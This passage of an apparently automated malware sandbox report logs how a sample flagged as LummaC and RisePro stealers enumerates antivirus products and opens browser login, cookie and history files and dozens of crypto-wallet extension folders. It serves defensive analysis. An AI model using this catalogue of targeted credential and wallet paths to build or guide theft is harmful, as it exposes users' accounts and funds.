                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exeQueries volume information: C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00C8DEAD GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00C8DEAD
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000007.00000002.1920810654.0000000001472000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.1936828284.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.1936237566.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.0000000000705000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.0000000000785000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2049332296.000000000358C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1740, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2128, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Yara detected RisePro Stealer
                  Source: Yara matchFile source: 00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip, type: DROPPED
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000005FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
